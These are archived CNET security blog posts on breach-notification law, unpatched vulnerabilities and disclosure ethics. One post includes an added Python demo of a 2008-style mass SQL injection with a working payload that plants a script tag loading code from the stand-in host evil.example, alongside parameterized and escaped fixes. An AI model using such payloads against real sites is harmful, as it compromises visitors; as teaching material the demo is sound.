Security

April 14, 2009 10:57 AM PDT

Why a national data breach notification law makes sense

by Jon Oltsik

As we await the 60-day federal cybersecurity review from Melissa Hathaway, acting senior director for cyberspace for the National Security and Homeland Security Councils, there is a related step the federal government could take right now to protect the private information of U.S. citizens while reducing the cost of doing so. In my humble opinion, it is time to create a single federal data breach disclosure law. I believe this action would:

  1. Simplify the maze of current state legislation. As of the end of December 2008, 44 states, the District of Columbia, Puerto Rico, and the U.S. Virgin Islands had enacted security breach notification legislation. While most of these laws are modeled on the original California legislation (SB-1386) that took effect in 2003, they differ in subtle ways: notification deadlines, definitions of covered data, and civil penalties. Massachusetts and Nevada have gone the furthest so far by mandating that private data be encrypted in certain circumstances. Obviously, this creates a legislative mess that could be streamlined by one central federal regulation.

  2. Protect the unprotected. In the six years since California started the trend toward data breach notification legislation, Alabama, Kentucky, Mississippi, New Mexico, and South Dakota still have no such laws in place, or have laws that haven't taken effect. I'm not sure why this is, but citizens in these states deserve the same protection the rest of us have.

  3. Extend the definition of private data into other areas. Aside from state data notification laws, many large organizations must also comply with the Health Insurance Portability and Accountability Act, the Gramm-Leach-Bliley Act, the Sarbanes-Oxley Act, etc. There must be a way to broaden the definition of private data and consolidate private data security and breach notification legislation, as the European Union has done. The cost of compliance could drop precipitously if organizations were not obligated to perform the same basic tasks and audits numerous times under different regimes.

If we are truly looking for ways to improve electronic data security and reduce cost and overhead, this seems like a good plan to me. I know my argument is simple and I'd be glad to learn more as to whether this logic makes sense. Please let me know if my instincts are correct or whether I've missed some important issues.

February 2, 2009 10:53 AM PST

IBM report: Vulnerabilities still going unpatched

by Elinor Mills

More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.

Vendors with the most vulnerabilities disclosed in 2008.

(Credit: IBM X-Force)

Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.

Overall, Microsoft is the vendor with the largest share of vulnerabilities disclosed, the report said. Apple's Macintosh operating system and the base Linux kernel have held the top spots for vulnerabilities by operating system over the past three years, the report said. The report gives no breakdown of unpatched vulnerabilities by vendor or operating system.

Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent) and Turkey (7.8 percent), although the country of the sending machine is not necessarily where the spammer operates, the report says.

China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.

Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games or doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.

Two main attack trends last year were SQL injection, in which attacker-supplied input is passed unchecked into a database query, and malicious URLs hosting exploits. In 2008 SQL injection was used on a mass scale to insert small malicious script tags into the database records that feed legitimate Web sites, so that every visitor to those sites was served the attacker's script.
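As an added illustration, not part of the original article or of the X-Force report, the following Python script shows the mechanism behind that kind of stored-content attack against a constructed in-memory SQLite database. An article-update endpoint that splices request fields into its SQL lets a single request rewrite every article body to carry an attacker's script tag; the parameterized version of the same endpoint stores the identical input as an inert literal, and HTML-escaping at render time keeps even a stored payload from executing. The table layout, the endpoint functions, the payload string and the host name evil.example are all hypothetical.

```python
"""Added example: how a 2008-style mass SQL injection seeds stored content
with a script tag, and how parameterized queries plus output escaping stop it.
Everything here is constructed for illustration: the schema, the endpoint
functions, the payload and the host name are hypothetical."""
import html
import sqlite3

# Hypothetical attacker script of the kind the 2008 campaigns planted in page content.
PAYLOAD_SCRIPT = '<script src="http://evil.example/x.js"></script>'

# The injected value closes the open string literal, widens the WHERE clause
# to every row and comments out the remainder of the original statement.
INJECTION = PAYLOAD_SCRIPT + "' WHERE 1=1 --"

# Constructed sample rows: three articles a Web site would render.
SEED_ROWS = [
    (1, "Welcome", "Hello, reader."),
    (2, "Notice", "Site news."),
    (3, "FAQ", "Questions."),
]


def make_db() -> sqlite3.Connection:
    """Build the constructed sample database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO articles (id, title, body) VALUES (?, ?, ?)", SEED_ROWS
    )
    conn.commit()
    return conn


def update_body_vulnerable(conn: sqlite3.Connection, article_id: str, new_body: str) -> None:
    """Vulnerable endpoint: request fields are spliced into the SQL text, so
    quotes and comment markers in new_body become part of the statement."""
    sql = f"UPDATE articles SET body = '{new_body}' WHERE id = {article_id}"
    conn.execute(sql)
    conn.commit()


def update_body_safe(conn: sqlite3.Connection, article_id: str, new_body: str) -> None:
    """Hardened endpoint: placeholders keep data out of the statement's grammar.
    The driver binds the values, so the same input is stored as a literal string."""
    conn.execute(
        "UPDATE articles SET body = ? WHERE id = ?", (new_body, int(article_id))
    )
    conn.commit()


def bodies(conn: sqlite3.Connection) -> list:
    """Article bodies in id order, i.e. what the site would serve."""
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


def render_unescaped(conn: sqlite3.Connection, article_id: int) -> str:
    """Page template that trusts stored content: an injected tag executes."""
    title, body = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return f"<h1>{title}</h1><p>{body}</p>"


def render_escaped(conn: sqlite3.Connection, article_id: int) -> str:
    """Second layer of defence: HTML-escape stored content at output time, so
    even a payload that reached the database is shown as text, not executed."""
    title, body = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return f"<h1>{html.escape(title)}</h1><p>{html.escape(body)}</p>"


def demo_vulnerable() -> list:
    """One request against the vulnerable endpoint rewrites every article."""
    conn = make_db()
    update_body_vulnerable(conn, "2", INJECTION)
    return bodies(conn)


def demo_safe() -> list:
    """The same request against the safe endpoint changes only article 2 and
    stores the attack string verbatim rather than executing it as SQL."""
    conn = make_db()
    update_body_safe(conn, "2", INJECTION)
    return bodies(conn)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("safe:      ", demo_safe())
```

Run as a script, the vulnerable path reports the script tag as the body of all three articles after one request, while the safe path leaves articles 1 and 3 untouched and keeps the whole attack string, quote and comment marker included, as the literal body of article 2. The two render functions make the second point: parameterization stops the statement from being rewritten, but only output escaping stops a payload that has already reached the database from running in visitors' browsers.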

The operating systems with the most vulnerability disclosures in 2008.

(Credit: IBM X-Force)

Updated 2:25 p.m. PST to add that the report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.

September 17, 2008 6:09 PM PDT

Security researchers and vendors--a truce?

by Elinor Mills

There has historically been a clash between security researchers who find security flaws in software products and the companies that make those products.

But two recent examples of cooperation between researchers and vendors show hope for future truces.

Leading by example was Dan Kaminsky, director of penetration testing for IOActive, who warned DNS software vendors about a serious cache-poisoning flaw in the DNS (Domain Name System) months before going public, so that vendors could release patches first.

"What he and others he took into his confidence did over the last few months was not only responsible but extraordinary," my colleague Robert Vamosi wrote in a column about Kaminsky's unprecedented disclosure restraint.

This week, security researchers Robert "RSnake" Hansen and Jeremiah Grossman agreed to withdraw their presentation on a new Web attack they dubbed "Clickjacking" from an upcoming OWASP USA security conference in New York at Adobe Systems' request. Adobe can now create a patch for one of its applications before the researchers release proof-of-concept code for the vulnerability, which would allow an attacker to take over the microphone and Webcam on a computer, according to a report on the Dark Reading site on Tuesday. (Oddly, the researchers say the vulnerability is actually due to an architectural issue in Internet Explorer.)

"I've always had this philosophy. If you find a mediocre to bad vulnerability, it's better to just talk about it, get it out in the open, and let the world see it," RSnake wrote in a first-person account of the situation on Dark Reading. "However, I've always told myself if I found something like a complete remote desktop compromise or something equally bad, that I'd let the vendors know. The last thing I want to do is spawn a botnet army based on my research. There's a big difference between educating the community about a problem and empowering bad guys."

Most of the researcher-vendor conflict comes down to timing. Vendors tend to want researchers to keep mum until a fix is ready. Researchers want to go public sooner rather than later, so that people relying on those products know they are at risk. Going public can also motivate a vendor that is dragging its feet on acknowledging and fixing the problem.

In 2002, Hewlett-Packard threatened to sue researchers who had publicized a vulnerability in the company's Tru64 Unix operating system. The case was notable in that it was the first time the Digital Millennium Copyright Act had been invoked to stifle research related to computer security.

Previously, the DMCA had been used to prosecute or threaten researchers who had discovered ways to break copyright protections. For instance, Russian programmer Dmitry Sklyarov went to jail in 2001 after Adobe convinced the Justice Department that he had violated the DMCA by breaking e-book protections, but he was later released. And Princeton University professor Edward Felten and his students withdrew a paper on how to break e-music protections after being threatened by the recording industry.

In 2005, Cisco Systems filed a lawsuit against security researcher Michael Lynn just hours after he gave a presentation at Defcon about how attackers could take over Cisco routers. That case was ultimately settled.

These threats and legal actions are unnecessary. Kaminsky, Hansen, and Grossman have shown that there can be compromise. That's a good lesson for three MIT students who pulled a talk at Defcon this summer on hacking the Massachusetts subway system, and for the transit officials who hauled them into court.

August 7, 2008 4:30 PM PDT

Microsoft to seek credit for finding vulnerabilities

by Elinor Mills

LAS VEGAS--Microsoft is jumping into the responsible disclosure game.

The company announced at the Black Hat security conference on Thursday that it is formalizing its program of informing third-party software vendors of security problems with products that run on top of Windows.

"We've seen the threat environment change," said Andrew Cushman, who runs the Microsoft Security Response Center.

Vista is more secure than XP and has fewer infections, he said. In addition, exploits increasingly target third-party software rather than the browser itself, he added.

The MSRC already reports vulnerabilities to other companies, but it will now ask to be credited for finding them. Microsoft will not post advisories for the third-party security issues it finds, as it does for vulnerabilities in its own software, Cushman said.

The issue of responsible disclosure is constantly being debated, with vendors often arguing that researchers are too quick to go public when they find a vulnerability and researchers countering that if they didn't go public the vendors would drag their heels on fixing the problem.

"Microsoft is in a unique position to help in that dimension," he said. "We bring a little different gravitas to the table. I think we can actually change the dynamic around responsible disclosure."

Earlier in the week, Microsoft said it would be giving third-party vendors a sneak peek at the technical details of the vulnerabilities in Microsoft software before the company releases its monthly "Patch Tuesday" updates. The company also announced it would help companies prioritize the vulnerabilities in its updates.


August 1, 2008 4:00 AM PDT

The ethics of lock picking and telling

by Elinor Mills

In 2004, a video circulated on the Internet showing how a standard Bic pen could be used to open the U-shaped Kryptonite bike lock. The company recalled the locks, replaced newer purchases, and changed the design for new locks. Problem solved, right?

Not exactly. Despite the fact that the problem had been revealed 12 years earlier in a British bike magazine, Kryptonite had continued to sell the locks unchanged. Angry customers filed a class action lawsuit that was settled in 2005, with Kryptonite offering to replace all affected locks or provide vouchers, and to compensate people whose bicycles were stolen as a result of the lock being picked.

"If you don't make the problems public, the companies don't fix them and the consumers buy shoddy stuff," said Bruce Schneier, chief security technology officer at BT.

Bruce Schneier is chief security technology officer at BT.

(Credit: Schneier.com)

Plenty has been written about breaking into the virtual locks that safeguard sensitive data on the Web. But picking real-world physical locks is becoming an increasingly popular pastime as well. Enthusiasts have formed sporting clubs and hold regular competitions. Security researchers write books about how locks can be defeated and show how it's done on blogs, in videos, and at security conferences.

Naturally, lock manufacturers aren't happy. They argue that publicizing the vulnerabilities causes people to panic unnecessarily and puts the public at risk by giving criminals information they can use to break door locks, safes, and other secured assets.

But, just as third-party disclosure of software vulnerabilities forces manufacturers to acknowledge security holes and patch them quickly, lock manufacturers will find they can't escape the same scrutiny and will be held accountable for their products, experts say.
